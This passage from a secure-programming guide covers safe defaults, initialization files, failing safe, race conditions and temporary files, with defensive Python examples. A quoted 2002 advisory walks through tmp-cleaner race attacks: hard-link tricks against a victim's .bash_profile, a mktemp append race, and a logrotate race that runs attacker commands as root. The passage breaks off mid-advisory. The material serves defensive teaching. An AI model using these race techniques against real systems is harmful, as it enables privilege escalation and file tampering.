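    """Build a new environment instead of trying to clean the inherited one."""
    env = {"PATH": SAFE_PATH, "IFS": " \t\n"}
    for name in PASS_THROUGH:
        if name in inherited:
            env[name] = inherited[name]
    return env


def run_script(script_path, args=()):
    """Replace this process with the script, named by its full path."""
    if not os.path.isabs(script_path):
        raise ValueError("the script must be named by its full path")
    os.execve(script_path, [script_path, *args], safe_environment(os.environ))
```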
|
||
</sect1>
|
||
|
||
<sect1 id="safe-configure">
|
||
<title>Configure Safely and Use Safe Defaults</title>
|
||
|
||
<para>
|
||
Configuration is currently considered to be the number one security problem.
|
||
Therefore, you should spend some effort to (1) make the initial installation
|
||
secure, and (2) make it easy to reconfigure the system while keeping it secure.
|
||
</para>
|
||
|
||
<para>
|
||
Never have the installation routines install a working ``default'' password.
|
||
If you need to install new ``users'', that's fine - just set them up with
|
||
an impossible password, leaving time for administrators to set the password
|
||
(and leaving the system secure before the password is set).
|
||
Administrators will probably install hundreds of packages and almost
|
||
certainly forget to set the password - it's likely they won't even know
|
||
to set it, if you create a default password.
|
||
<!-- This has hurt many a system, for example,
|
||
Red Hat did this with the ``piranha'' package (it was widely denounced
|
||
in April 1999), and Microsoft did this with SQL Server 7.0 when running
|
||
in ``mixed mode''. -->
|
||
<!-- http://slashdot.org/articles/00/08/21/0759251.shtml,
|
||
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26date%3D2000-08-15%26msg%3DB9D1827FDF66D111925800805F3102E31E7AAB6E%40RED-MSG-57 -->
|
||
</para>
|
||
|
||
<para>
|
||
A program should have the most restrictive access policy
|
||
until the administrator has a chance to configure it.
|
||
Please don't create ``sample'' working users or
|
||
``allow access to all'' configurations as the starting configuration;
|
||
many users just ``install everything'' (installing all available services)
|
||
and never get around to configuring many services.
|
||
In some cases the program may be able to determine that a more generous
|
||
policy is reasonable by depending on the existing authentication system;
|
||
for example, an ftp server could legitimately determine that a user who
|
||
can log into a user's directory should be allowed to access that user's files.
|
||
Be careful with such assumptions, however.
|
||
</para>
|
||
|
||
<para>
|
||
Have installation scripts install a program as safely as possible.
|
||
By default, install all files as owned by root or some other
|
||
system user and make them unwriteable by others;
|
||
this prevents non-root users from installing viruses.
|
||
Indeed, it's best to make them unreadable by all but the trusted user.
|
||
Allow non-root installation where possible as well, so that users without
|
||
root privileges and administrators who do not fully trust the
|
||
installer can still use the program.
|
||
</para>
|
||
|
||
<para>
|
||
When installing, check to make sure that any assumptions necessary for
|
||
security are true.
|
||
Some library routines are not safe on some platforms; see the discussion of
|
||
this in <xref linkend="call-only-safe">.
|
||
If you know which platforms your application will run on, you need not
|
||
check their specific attributes, but in that case you should
|
||
check to make sure that the program is being installed on only one of
|
||
those platforms.
|
||
Otherwise, you should require a manual override to install the program,
|
||
because you don't know if the result will be secure.
|
||
</para>
|
||
|
||
<para>
|
||
Try to make configuration as easy and clear as possible, including
|
||
post-installation configuration.
|
||
Make using the ``secure'' approach as easy as possible, or many users
|
||
will use an insecure approach without understanding the risks.
|
||
On Linux,
|
||
take advantage of tools like linuxconf, so that users can easily configure
|
||
their system using an existing infrastructure.
|
||
</para>
|
||
|
||
<para>
|
||
If there's a configuration language, the default should be to deny access
|
||
until the user specifically grants it.
|
||
Include many clear comments in the sample configuration file, if there is one,
|
||
so the administrator understands what the configuration does.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="init-safe">
|
||
<title>Load Initialization Values Safely</title>
|
||
|
||
<para>
|
||
Many programs read an initialization file to allow their defaults to be
|
||
configured.
|
||
You must ensure that an attacker can't change which initialization file
|
||
is used, nor create or modify that file.
|
||
Often you should <emphasis>not</emphasis> use the current directory
|
||
as a source of this information, since if the program is used as an
|
||
editor or browser, the user may be viewing the directory controlled
|
||
by someone else.
|
||
<!-- Joe had this problem: http://lwn.net/2001/0301/a/sec-joe.php3 -->
|
||
Instead, if the program is a typical user application, you should load
|
||
any user defaults from a hidden file or directory contained in the user's
|
||
home directory.
|
||
If the program is setuid/setgid, don't read any file controlled by the
|
||
user unless you carefully filter it as an untrusted (potentially
|
||
hostile) input.
|
||
Trusted configuration values should be loaded from somewhere else
|
||
entirely (typically from a file in /etc).
|
||
</para>
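<para>
For an ordinary (non-setuid) user application, loading defaults from a
hidden file in the home directory might look like the following sketch.
The file name .exampleapprc and the function read_user_defaults() are
hypothetical.
The ownership and permission checks are an assumption added for this
example; they are one way to notice that someone other than the user
could have created or modified the file.
</para>

```python
import os
import stat


def read_user_defaults(name=".exampleapprc", home=None):
    """Return the text of the user's defaults file, or None if there is none."""
    if home is None:
        home = os.path.expanduser("~")
    path = os.path.join(home, name)   # never the current directory
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except FileNotFoundError:
        return None
    with os.fdopen(fd, "r") as handle:
        info = os.fstat(handle.fileno())   # check the file actually opened
        if not stat.S_ISREG(info.st_mode):
            raise PermissionError("defaults file is not a regular file")
        if info.st_uid != os.getuid():
            raise PermissionError("defaults file is owned by someone else")
        if info.st_mode & 0o022:
            raise PermissionError("defaults file is writable by others")
        return handle.read()
```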
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="fail-safe">
|
||
<title>Fail Safe</title>
|
||
|
||
<para>
|
||
A secure program should always ``fail safe'', that is,
|
||
it should be designed so that if the program does fail, the safest
|
||
result should occur.
|
||
For security-critical programs, that usually means that
|
||
if some sort of misbehavior is detected (malformed input,
|
||
reaching a ``can't get here'' state, and so on), then the program
|
||
should immediately deny service and stop processing that request.
|
||
Don't try to ``figure out what the user wanted'': just deny the service.
|
||
Sometimes this can decrease reliability or usability
|
||
(from a user's perspective), but it increases security.
|
||
There are a few cases where this might not be desired (e.g., where denial of
|
||
service is much worse than loss of confidentiality or integrity), but
|
||
such cases are quite rare.
|
||
</para>
|
||
|
||
<para>
|
||
Note that I recommend ``stop processing the request'', not ``fail altogether''.
|
||
In particular, most servers should not completely halt when given malformed
|
||
input, because that creates a trivial opportunity for a denial of service
|
||
attack (the attacker just sends garbage bits to prevent you from using the
|
||
service).
|
||
Sometimes taking the whole server down is necessary; in particular,
|
||
reaching some ``can't get here'' states may signal a problem so drastic
|
||
that continuing is unwise.
|
||
</para>
|
||
|
||
<para>
|
||
Consider carefully what error message you send back when a failure is detected.
|
||
If you send nothing
|
||
back, it may be hard to diagnose problems, but sending back too much
|
||
information may unintentionally aid an attacker.
|
||
Usually the best approach is to reply with ``access denied'' or
|
||
``miscellaneous error encountered'' and then
|
||
write more detailed information to an audit log (where you can have more
|
||
control over who sees the information).
|
||
</para>
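<para>
A minimal sketch of this pattern follows: the request is refused with a
generic reply, the details go to a log, and the server itself keeps
running.
The request syntax, the logger name ``audit'', and handle_request() are
made up for the example.
</para>

```python
import logging
import re

audit_log = logging.getLogger("audit")           # hypothetical logger name
_VALID = re.compile(r"GET ([a-z0-9]{1,32})")     # made-up request syntax


def handle_request(line, client="unknown"):
    """Serve one request; on any problem, refuse it and carry on."""
    match = _VALID.fullmatch(line)
    if match is None:
        # Do not guess what the user wanted. The details go to the
        # audit log only; the client learns nothing specific.
        audit_log.warning("rejected request from %s: %r", client, line[:200])
        return "access denied"
    return "OK " + match.group(1)
```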
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="avoid-race">
|
||
<title>Avoid Race Conditions</title>
|
||
|
||
<para>
|
||
A ``race condition'' can be defined as
|
||
``Anomalous behavior due to unexpected critical dependence
|
||
on the relative timing of events''
|
||
[FOLDOC].
|
||
Race conditions generally involve one or more processes
|
||
accessing a shared resource (such as a file or variable), where this
|
||
multiple access has not been properly controlled.
|
||
</para>
|
||
|
||
<para>
|
||
In general, a process does not execute atomically;
|
||
another process may interrupt it between essentially any two instructions.
|
||
If a secure program's process is not prepared for these interruptions,
|
||
another process may be able to interfere with the secure program's process.
|
||
Any pair of operations in a secure program must still work correctly
|
||
if an arbitrary amount of another process's code is executed between them.
|
||
</para>
|
||
|
||
<para>
|
||
Race condition problems can be notionally divided into two categories:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Interference caused by untrusted processes.
|
||
Some security taxonomies call this problem a
|
||
``sequence'' or ``non-atomic'' condition.
|
||
These are conditions caused by processes running other, different programs,
|
||
which ``slip in'' other actions between steps of the secure program.
|
||
These other programs might be invoked by an attacker specifically
|
||
to cause the problem.
|
||
This book will call these sequencing problems.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Interference caused by trusted processes (from the secure program's
|
||
point of view).
|
||
Some taxonomies call these deadlock, livelock, or locking failure conditions.
|
||
These are conditions caused by processes running the ``same'' program.
|
||
Since these different processes may have the ``same'' privileges, if
|
||
not properly controlled they may be able to interfere with each other in
|
||
a way other programs can't.
|
||
Sometimes this kind of interference can be exploited.
|
||
This book will call these locking problems.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
|
||
<!-- http://webreview.com/wr/pub/97/08/08/bookshelf Suggested
|
||
this kind of division:
|
||
|
||
Sequence conditions: Be aware that your program does not
|
||
execute atomically. That is, the program can be interrupted
|
||
between any two operations to let another program run for a
|
||
while, including one that is trying to abuse yours. Thus, check
|
||
your code carefully for any pair of operations that might fail if
|
||
arbitrary code is executed between them.
|
||
|
||
Deadlock conditions: Remember, more than one copy of your
|
||
program may be running at the same time. Use file locking for
|
||
any files that you modify.
|
||
Provide a way to recover the locks in
|
||
the event that the program crashes while a lock is held. Avoid
|
||
deadlocks or "deadly embraces," which can occur when one
|
||
program attempts to lock file A and then file B, while another
|
||
program already holds a lock for file B and then attempts to
|
||
lock file A.
|
||
-->
|
||
|
||
<sect2 id="non-atomic">
|
||
<title>Sequencing (Non-Atomic) Problems</title>
|
||
|
||
<para>
|
||
In general,
|
||
you must check your code for any pair of operations that might fail if
|
||
arbitrary code is executed between them.
|
||
</para>
|
||
|
||
<para>
|
||
Note that loading and saving a shared variable are usually implemented
|
||
as separate operations and are not atomic.
|
||
This means that an ``increment variable'' operation is usually converted into
|
||
separate loading, incrementing, and saving operations, so if the variable's memory
|
||
is shared, another process may interfere with the incrementing.
|
||
</para>
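<para>
The usual remedy is to make the load, increment, and save steps a single
critical section.
The sketch below uses threads in one Python process as a stand-in for
processes sharing memory, which is an assumption made to keep the
example self-contained; the names SharedCounter and count_with_threads()
are invented here.
</para>

```python
import threading


class SharedCounter:
    def __init__(self):
        self.value = 0
        self._lock = threading.Lock()

    def increment(self):
        # Without the lock, two threads could both load the same old
        # value, and one of the two updates would be lost.
        with self._lock:
            self.value += 1


def count_with_threads(workers, increments_each):
    """Increment one shared counter from several threads and return the total."""
    counter = SharedCounter()

    def work():
        for _ in range(increments_each):
            counter.increment()

    threads = [threading.Thread(target=work) for _ in range(workers)]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return counter.value
```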
|
||
|
||
<para>
|
||
<!-- ??? Extend this. -->
|
||
Secure programs must determine if a request should be granted, and if
|
||
so, act on that request.
|
||
There must be no way for an untrusted user to change anything used in
|
||
this determination before the program acts on it.
|
||
This kind of race condition is sometimes termed a
|
||
``time of check - time of use'' (TOCTOU) race condition.
|
||
</para>
|
||
|
||
<sect3 id="atomic-filesystem">
|
||
<title>Atomic Actions in the Filesystem</title>
|
||
|
||
<para>
|
||
The problem of failing to perform atomic actions
|
||
repeatedly comes up in the filesystem.
|
||
In general, the filesystem is a shared resource used by many programs,
|
||
and some programs may interfere with its use by other programs.
|
||
Secure programs should generally avoid using access(2) to determine
|
||
if a request should be granted, followed later by open(2), because users
|
||
may be able to move files around between these calls, possibly creating
|
||
symbolic links or files of their own choosing instead.
|
||
A secure program should instead set its effective id or filesystem id,
|
||
then make the open call directly.
|
||
It's possible to use access(2) securely, but only when a user cannot affect
|
||
the file or any directory along its path from the filesystem root.
|
||
</para>
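<para>
The ``set the effective id, then open'' approach could be sketched like
this for a setuid program acting on behalf of the invoking user.
open_as_invoker() is a hypothetical helper; it assumes the real
user and group ids identify the invoking user, and it does not deal with
supplementary groups, which a complete implementation would also have
to consider.
</para>

```python
import os


def open_as_invoker(path, flags=os.O_RDONLY):
    """Open path with the invoking user's identity, without calling access()."""
    saved_euid, saved_egid = os.geteuid(), os.getegid()
    os.setegid(os.getgid())    # change the group first, while still privileged
    os.seteuid(os.getuid())
    try:
        # The kernel checks permission and opens the file in one step,
        # so there is no gap in which the file can be swapped.
        return os.open(path, flags)
    finally:
        os.seteuid(saved_euid)  # restore in the reverse order
        os.setegid(saved_egid)
```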
|
||
|
||
<para>
|
||
When creating a file, you should
|
||
open it using the modes O_CREAT | O_EXCL and grant only
|
||
very narrow permissions (only to the current user);
|
||
you'll also need to prepare for having the open fail.
|
||
If you need to be able to open the file (e.g., to prevent a
|
||
denial-of-service), you'll need to repetitively
|
||
(1) create a ``random'' filename, (2) open the file as noted,
|
||
and (3) stop repeating when the open succeeds.
|
||
</para>
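<para>
The three steps above can be sketched as a short loop.
The function name create_new_file(), the ``data-'' prefix, and the limit
of 100 attempts are assumptions for illustration; the flags and the
0600 mode are the ones the text calls for.
</para>

```python
import os
import secrets


def create_new_file(directory, prefix="data-", attempts=100):
    """Create a brand-new file in directory and return (descriptor, path)."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL
    for _ in range(attempts):
        # (1) create a ``random'' filename
        path = os.path.join(directory, prefix + secrets.token_hex(8))
        try:
            # (2) O_EXCL makes the open fail if the name already exists,
            # even if it exists as a symbolic link
            return os.open(path, flags, 0o600), path
        except FileExistsError:
            continue  # (3) keep repeating until an open succeeds
    raise FileExistsError("could not create a new file in " + directory)
```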
|
||
|
||
<para>
|
||
Ordinary programs can become security weaknesses if they
|
||
don't create files properly.
|
||
For example, the ``joe'' text editor had a weakness called the
|
||
``DEADJOE'' symlink vulnerability.
|
||
When joe was exited in a nonstandard way (such as a system crash, closing an
|
||
xterm, or a network connection going down), joe would unconditionally append
|
||
its open buffers to the file "DEADJOE".
|
||
This could be exploited by the
|
||
creation of DEADJOE symlinks in directories where root would normally use joe.
|
||
In this way, joe could be used to append garbage to
|
||
potentially-sensitive files, resulting in a denial of service and/or
|
||
unintentional access.
|
||
<!-- This joe issue was noted in various places in the year 2000;
|
||
the note is from the Red Hat vulnerability summary. -->
|
||
</para>
|
||
|
||
<!-- From http://java.sun.com/security/seccodeguide.html:
|
||
In the same vein, it's often better to use fchmod() and
|
||
fchown() instead of chmod(), chown(), and chgrp().
|
||
If you close a file and then use chmod() to change the permissions, and
|
||
the file or a directory in the directory's path is writeable by another,
|
||
an attacker may be able to remove the file and create a symbolic link
|
||
to another file (say /etc/passwd, to add/remove interesting values, or
|
||
to /dev/zero, to provide an infinitely-long data stream of input to
|
||
your program).
|
||
|
||
From http://webreview.com/wr/pub/97/08/08/bookshelf:
|
||
In particular, when you are performing a series of operations on a
|
||
file, such as changing its owner, stat ing the file, or changing its
|
||
mode, first open the file and then use the fchown( ), fstat( ), or
|
||
fchmod( ) system calls. Doing so will prevent the file from being
|
||
replaced while your program is running (a possible race condition).
|
||
Also avoid the use of the access( ) function to determine your ability
|
||
to access a file: using the access( ) function followed by an open( ) is
|
||
a race condition, and almost always a bug.
|
||
-->
|
||
|
||
<para>
|
||
As another example, when performing a series of operations on a file's
|
||
meta-information (such as changing its owner, stat-ing the file, or
|
||
changing its permission bits), first open the file and then use the
|
||
operations on open files.
|
||
This means use the fchown( ), fstat( ), or fchmod( ) system calls,
|
||
instead of the functions taking filenames
|
||
such as chown(), chgrp(), and chmod().
|
||
Doing so will prevent the file from being
|
||
replaced while your program is running (a possible race condition).
|
||
For example, if you close a file and then use chmod()
|
||
to change its permissions,
|
||
an attacker may be able to move or remove the file between those
|
||
two steps and create a symbolic link to another file
|
||
(say /etc/passwd).
|
||
Other interesting files include /dev/zero, which can
|
||
provide an infinitely-long data stream of input to a program; if an
|
||
attacker can ``switch'' the file midstream, the results can be dangerous.
|
||
<!-- Based on http://java.sun.com/security/seccodeguide.html and
|
||
http://webreview.com/wr/pub/97/08/08/bookshelf: -->
|
||
</para>
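<para>
In Python the descriptor-based calls are available as os.fstat(),
os.fchown(), and os.fchmod().
The helper below, make_private(), is a hypothetical example of using
them on a file that is already open; nothing in it refers to the file
by name, so renaming or replacing the path cannot redirect it.
</para>

```python
import os
import stat


def make_private(fd, uid=-1, gid=-1):
    """Restrict the already-open file fd to its owner, using only the descriptor."""
    info = os.fstat(fd)                # describes the file we actually hold
    if not stat.S_ISREG(info.st_mode):
        raise ValueError("not a regular file")
    if uid != -1 or gid != -1:
        os.fchown(fd, uid, gid)        # -1 leaves that id unchanged
    os.fchmod(fd, 0o600)               # owner read/write only
    return info
```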
|
||
|
||
<para>
|
||
But even this gets complicated - when creating files, you must give
|
||
them as minimal a set of rights as possible, and then change the
|
||
rights to be more expansive if you desire.
|
||
Generally, this means you need to use umask and/or open's parameters to
|
||
limit initial access to just the user and user group.
|
||
For example, if you create a file that is initially world-readable, then
|
||
try to turn off the ``world readable'' bit, an attacker could try to
|
||
open the file while the permission bits said this was okay.
|
||
On most Unix-like systems, permissions are only checked on open, so
|
||
this would result in an attacker having more privileges than intended.
|
||
</para>
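<para>
A sketch of ``create narrowly, widen later'' follows.
publish() is an invented name, and the final mode 0644 is only an
example of a more expansive setting; the important part is that the
file is never more accessible than intended at any moment.
</para>

```python
import os


def publish(path, data):
    """Create path readable only by its owner, fill it, then widen access."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
        handle.flush()
        # Widen the permissions only after the contents are complete,
        # and do it through the descriptor rather than the name.
        os.fchmod(handle.fileno(), 0o644)
```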
|
||
|
||
<para>
|
||
In general, if multiple users can write to a directory in a Unix-like
|
||
system, you'd better have the ``sticky'' bit set on that directory,
|
||
and sticky directories had better be implemented.
|
||
It's much better to completely avoid the problem, however, and create
|
||
directories that only a trusted special process can access
|
||
(and then implement that carefully).
|
||
The traditional Unix temporary directories (/tmp and /var/tmp) are usually
|
||
implemented as ``sticky'' directories, and all sorts of security problems
|
||
can still surface, as we'll see next.
|
||
</para>
|
||
|
||
</sect3>
|
||
|
||
<sect3 id="temporary-files">
|
||
<title>Temporary Files</title>
|
||
|
||
<para>
|
||
This issue of correctly performing atomic operations
|
||
particularly comes up when creating temporary files.
|
||
Temporary files in Unix-like systems are traditionally
|
||
created in the /tmp or /var/tmp directories,
|
||
which are shared by all users.
|
||
A common trick by attackers is to create symbolic links in the
|
||
temporary directory to some other file (e.g., /etc/passwd)
|
||
while your secure program is running.
|
||
The attacker's goal is to create
|
||
a situation where the secure program determines that
|
||
a given filename doesn't exist, the attacker then creates the symbolic
|
||
link to another file, and then the secure program performs some operation
|
||
(but now it actually opened an unintended file).
|
||
Often important files can be clobbered or modified this way.
|
||
There are many variations to this attack, such as creating normal files,
|
||
all based on the
|
||
idea that the attacker can create (or sometimes
|
||
otherwise access) file system objects
|
||
in the same directory used by the secure program for temporary files.
|
||
</para>
|
||
|
||
<para>
|
||
In 2002, Michal Zalewski exposed another serious problem with
|
||
temporary directories involving automatic cleaning of temporary directories.
|
||
For more information, see his
|
||
posting to Bugtraq dated December 20, 2002,
|
||
(subject "[RAZOR] Problems with mkstemp()").
|
||
Basically, Zalewski notes that
|
||
it's a common practice to have a program automatically sweep
|
||
temporary directories like /tmp and /var/tmp and remove "old" files
|
||
that have not been accessed for a while (e.g., several days).
|
||
Such programs are sometimes called "tmp cleaners" (pronounced "temp cleaners").
|
||
Possibly the most common tmp cleaner is "tmpwatch" by
|
||
Erik Troan and Preston Brown of Red Hat Software;
|
||
another common one is 'stmpclean' by Stanislav Shalunov;
|
||
many administrators roll their own as well.
|
||
Unfortunately, the existence of tmp cleaners creates an opportunity
|
||
for new security-critical race conditions;
|
||
an attacker may be able to arrange things so that the tmp cleaner
|
||
interferes with the secure program.
|
||
For example, an attacker could create an "old" file, arrange for
|
||
the tmp cleaner to plan to delete the file, delete the file himself,
|
||
and run a secure program that creates the same file - now the tmp cleaner
|
||
will delete the secure program's file!
|
||
Or, imagine that a secure program can have long delays after using the file
|
||
(e.g., a setuid program stopped with SIGSTOP and
|
||
resumed after many days with SIGCONT, or simply intentionally creating
|
||
a lot of work).
|
||
If the program is suspended or delayed for long enough,
|
||
its temporary files are likely to be
|
||
removed by the tmp cleaner.
|
||
</para>
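<para>
One way to reduce a program's dependence on the temporary file's name is
to keep only the descriptor and remove the name right after creation.
The sketch below is an illustration under that assumption, not a
complete defence: anonymous_temp_file() is a hypothetical helper, it
only suits files that never need to be reopened by name, and a brief
window remains between creating the file and unlinking it.
</para>

```python
import os
import tempfile


def anonymous_temp_file(directory=None):
    """Return a descriptor for a temporary file that no longer has a name."""
    # mkstemp() creates the file with O_CREAT | O_EXCL and mode 0600.
    fd, path = tempfile.mkstemp(dir=directory)
    # Once the name is gone, neither an attacker nor a tmp cleaner can
    # act on it; the data stays reachable through fd until it is closed.
    os.unlink(path)
    return fd
```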
|
||
<!--
|
||
Date: Sun, 22 Dec 2002 01:57:27 -0800 (PST)
|
||
From: "Michal Zalewski" lcamtuf, at, coredump dot cx
|
||
Subject: [RAZOR] Problems with mkstemp() (fwd)
|
||
|
||
|
||
Dave,
|
||
|
||
Thought you might be interested. I think there are some things you
|
||
might want to look at in the /tmp-related section of your FAQ (apologies if
|
||
you already got this).
|
||
|
||
Date: Fri, 20 Dec 2002 09:30:30 -0800 (PST)
|
||
From: Michal Zalewski <lcamtuf@ghettot.org>
|
||
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
|
||
full-disclosure@netsys.com
|
||
Cc: secprog@securityfocus.com
|
||
Subject: [RAZOR] Problems with mkstemp()
|
||
|
||
|
||
Common use of 'tmpwatch' utility and its counterparts triggers race
|
||
conditions in many applications
|
||
|
||
Michal Zalewski <lcamtuf@razor.bindview.com>, 12/05/2002
|
||
Copyright (C) 2002 by Bindview Corporation
|
||
|
||
|
||
1) Scope and exposure info
|
||
=====
|
||
|
||
A common practice of installing 'tmpwatch' utility or similar
|
||
software
|
||
configured to sweep the /tmp directory on Linux and unix systems can
|
||
compromise secure temporary file creation mechanisms in certain
|
||
applications,
|
||
creating a potential privilege escalation scenario. This document
|
||
briefly
|
||
discusses the exposure, providing some examples, and suggesting
|
||
possible
|
||
workarounds.
|
||
|
||
It is believed that many unix operating systems using 'tmpwatch' or
|
||
an
|
||
equivalent are affected. Numerous Linux systems, such as Red Hat,
|
||
that ship
|
||
with cron daemon running and 'tmpwatch' configured to sweep /tmp are
|
||
susceptible to the attack.
|
||
|
||
|
||
2) Application details
|
||
=====
|
||
|
||
'Tmpwatch' is a handy utility that removes files which haven't been
|
||
accessed for a period of time. It was developed by Erik Troan and
|
||
Preston Brown of Red Hat Software, and, with time, has become a
|
||
component of many Linux distributions, also ported to platforms
|
||
such as Solaris, *BSD or HP/UX. By default, it is installed with a
|
||
crontab entry that sweeps /tmp directory on a daily basis, deleting
|
||
files that have not been accessed for the past few days.
|
||
|
||
An alternative program, called 'stmpclean' and authored by Stanislav
|
||
Shalunov, is shipped with *BSD systems and some Linux distributions
|
||
to perform the same task, and some administrators deploy other tools
|
||
or
|
||
scripts for this purpose.
|
||
|
||
|
||
3) Vulnerability details
|
||
=====
|
||
|
||
Numerous applications rely either on mkstemp() or custom O_EXCL file
|
||
creation mechanisms to store temporary data in the /tmp directory
|
||
in a secure manner. Of those, certain programs run with elevated
|
||
privileges, or simply at a different privilege level than the caller.
|
||
|
||
The exposure is a result of a common misconception, promoted by
|
||
almost
|
||
all secure programming tutorials and manpages, that /tmp files
|
||
created
|
||
with mkstemp(), granted that umask() settings were proper, are
|
||
safe against hijacking and common races. The file, since it is
|
||
created
|
||
in a sticky-bit directory, indeed cannot be removed or replaced by
|
||
the attacker running with different non-root privileges, but since
|
||
many operating systems feature 'tmpwatch'-alike solutions, the only
|
||
thing that can and should be considered safe in /tmp is the
|
||
descriptor
|
||
returned by mkstemp() - the filename should not be relied upon. There
|
||
are two major reasons for this:
|
||
|
||
1) unlink() races
|
||
|
||
It is very difficult to remove a file without risking a potential
|
||
race (see section 4). 'Tmpwatch' does not take any extra measures
|
||
to
|
||
prevent races, and probes file creation time using lstat(). Based
|
||
on this
|
||
data, it calls unlink() as root. Problem is, on a multitasking
|
||
system, it
|
||
is possible for the attacker to get some CPU time between those
|
||
two system
|
||
calls, remove the old "decoy" file that has been probed with
|
||
lstat(), and
|
||
let the application of his choice create its own temporary file
|
||
under this
|
||
name. While mkstemp() names are guaranteed to be unique, they
|
||
shouldn't be
|
||
expected to be unpredictable - in most implementations, the name
|
||
is a
|
||
function of process ID and time - so it is possible for the
|
||
attacker to
|
||
guess it and create a decoy in advance. Once the tmpwatch process
|
||
is
|
||
resumed, the file is immediately removed, based on the result of
|
||
earlier lstat() on the old, no longer existing file.
|
||
|
||
While this three-component race requires very precise timing, it
|
||
is possible to try a number of times in a single 'tmpwatch' run if
|
||
enough decoy files are created by the attacker. Additionally,
|
||
since
|
||
each step of the attack would result in a corresponding filesystem
|
||
change, it is fairly easy to carefully measure timings and
|
||
coordinate the attack.
|
||
|
||
If the attacker cannot make the application run at the same time
|
||
as 'tmpwatch' - for example, if the application is executed by
|
||
hand by the administrator, or is running from cron - 'tmpwatch'
|
||
itself can be artificially delayed for almost an arbitrary amount
|
||
of time by creating and continuously expending an elaborate
|
||
directory
|
||
structure in /tmp using hard links (to preserve access times of
|
||
files) and running other processes that demand disk access and
|
||
cache space to slow down the process.
|
||
|
||
'Stmpclean' offers additional protection against races by not
|
||
removing
|
||
root-owned files and temporarily dropping privileges when removing
|
||
the file to match the owner of lstat()ed resource. Unfortunately,
|
||
not removing root files is a considerable drawback, and there is
|
||
still
|
||
a potential for a race using carefully crafted hard links to a
|
||
file
|
||
owned by the victim and two concurrent 'stmpclean' processes:
|
||
|
||
- the attacker links /tmp/foo to ~victim/.bash_profile
|
||
- tmpwatch #1 does lstat() on /tmp/foo and setuid victim
|
||
- tmpwatch #2 does lstat() on /tmp/foo and setuid victim
|
||
- tmpwatch #1 does unlink("/tmp/foo")
|
||
- victim application creates /tmp/foo at uid==victim
|
||
- tmpwatch #2 does unlink("/tmp/foo") and succeeds
|
||
- the attacker creates /tmp/foo
|
||
- victim application proceeds
|
||
|
||
On certain systems such as Owl Linux, the attack will not be
|
||
possible
|
||
due to hardlink limits imposed on sticky-bit directories.
|
||
|
||
2) suspended processes and 'legitimate' file removal
|
||
|
||
Here, all conventional measures that could be exercised by /tmp
|
||
cleaners
|
||
fail miserably. A vulnerable application can be often delayed or
|
||
suspended
|
||
after mkstemp() / open() - for example, a setuid program can be
|
||
stopped with SIGSTOP and resumed with SIGCONT. If the application
|
||
is
|
||
suspended for long enough, its temporary files are likely to be
|
||
removed. This method requires much less precision, but is also
|
||
more time-consuming and has a more limited scope (interactive
|
||
applications only).
|
||
|
||
Note that it is sometimes possible to delay the execution of
|
||
a daemon - client wait, considerable I/O or CPU loads, and
|
||
subsequent
|
||
mkstemp() calls can be all used to achieve the effect. The
|
||
feasibility and efficiency is low, but the potential issue
|
||
exists. Some client applications that are often left unattended
|
||
and create temporary files - such as mail/news clients, web
|
||
browsers, irc clients, etc - can also be used to compromise
|
||
other accounts on the machine.
|
||
|
||
Not all applications are prone to the problem just because mkstemp()
|
||
is used to create files in /tmp; if the file name is not used to
|
||
perform
|
||
any sensitive operations with some extra privileges afterward (read,
|
||
write, chown, chmod, link/rename, etc), and only the descriptor is
|
||
being used, the application is safe. This practice is often exercised
|
||
by
|
||
programmers who want to avoid leaving dangling temporary files in
|
||
case
|
||
the program is aborted or crashes. Similarly, if the application uses
|
||
temporary files improperly, but does not rely on their contents and
|
||
does
|
||
not attempt to access them with higher privileges, the application is
|
||
secure in that regard.
|
||
|
||
Applications that run with higher privileges and reopen their
|
||
/tmp temporary files for reading or writing, call chown(), chmod() on
|
||
them, rename or link the file to replace some sensitive information,
|
||
and
|
||
so on, are exposed. It is worth mentioning that a popular 'mktemp'
|
||
utility coming from OpenBSD passes only the filename to the
|
||
caller shell script, thus rendering almost all scripts using it
|
||
fundamentally flawed. If the script is being run as a cron job or
|
||
other administrative task, and mktemp is used, the system can be
|
||
likely
|
||
compromised by replacing the file after mktemp and prior to any write
|
||
to the file. In the example quoted in the documentation for
|
||
mktemp(1):
|
||
|
||
TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1
|
||
echo "program output" >> $TMPFILE
|
||
|
||
...the attacker would want to replace temporary file right before
|
||
'echo', causing the text "program output" to be appended to a target
|
||
file of his choice using symlinks or hardlinks; or, if it is more
|
||
desirable, he'd spoof file contents to cause the program to
|
||
misbehave.
|
||
|
||
Another example of the problem is a popular logrotate utility,
|
||
coded - ironically - by Erik Troan, one of co-authors of 'tmpwatch'
|
||
itself. The program suffered /tmp races in the past, but later
|
||
switched to mkstemp(). The following sequence is used to handle
|
||
post-rotation shell commands specified in config files:
|
||
|
||
open("/tmp/logrotate.wvpNmP", O_WRONLY|O_CREAT|O_EXCL, 0700) = 6
|
||
...
|
||
write(6, "#!/bin/sh\n\n", 11) = 11
|
||
write(6, "\n\t/bin/kill -HUP `cat /var/lock/"..., 79) = 79
|
||
close(6) = 0
|
||
... fork, etc ...
|
||
execve("/bin/sh", ["sh", "-c", "/bin/sh /tmp/logrotate.wvpNmP" ...
|
||
|
||
Obviously, if the attacker can have /tmp/logrotate.* replaced in
|
||
between mkstemp() (represented as open() syscall above) and the
|
||
point where another process is spawned, a shell interpreter is
|
||
invoked,
|
||
then executes another copy of the shell interpreter (apparent
|
||
programmer's mistake) and finally reads the input file - which is
|
||
a considerable chunk of time - the shell will be called with
|
||
attacker-supplied commands to be executed with root privileges.
|
||
|
||
On Red Hat, logrotate is executed from crontab on a daily basis, in
|
||
a sequence before 'tmpwatch', and the easiest option for the attacker
|
||
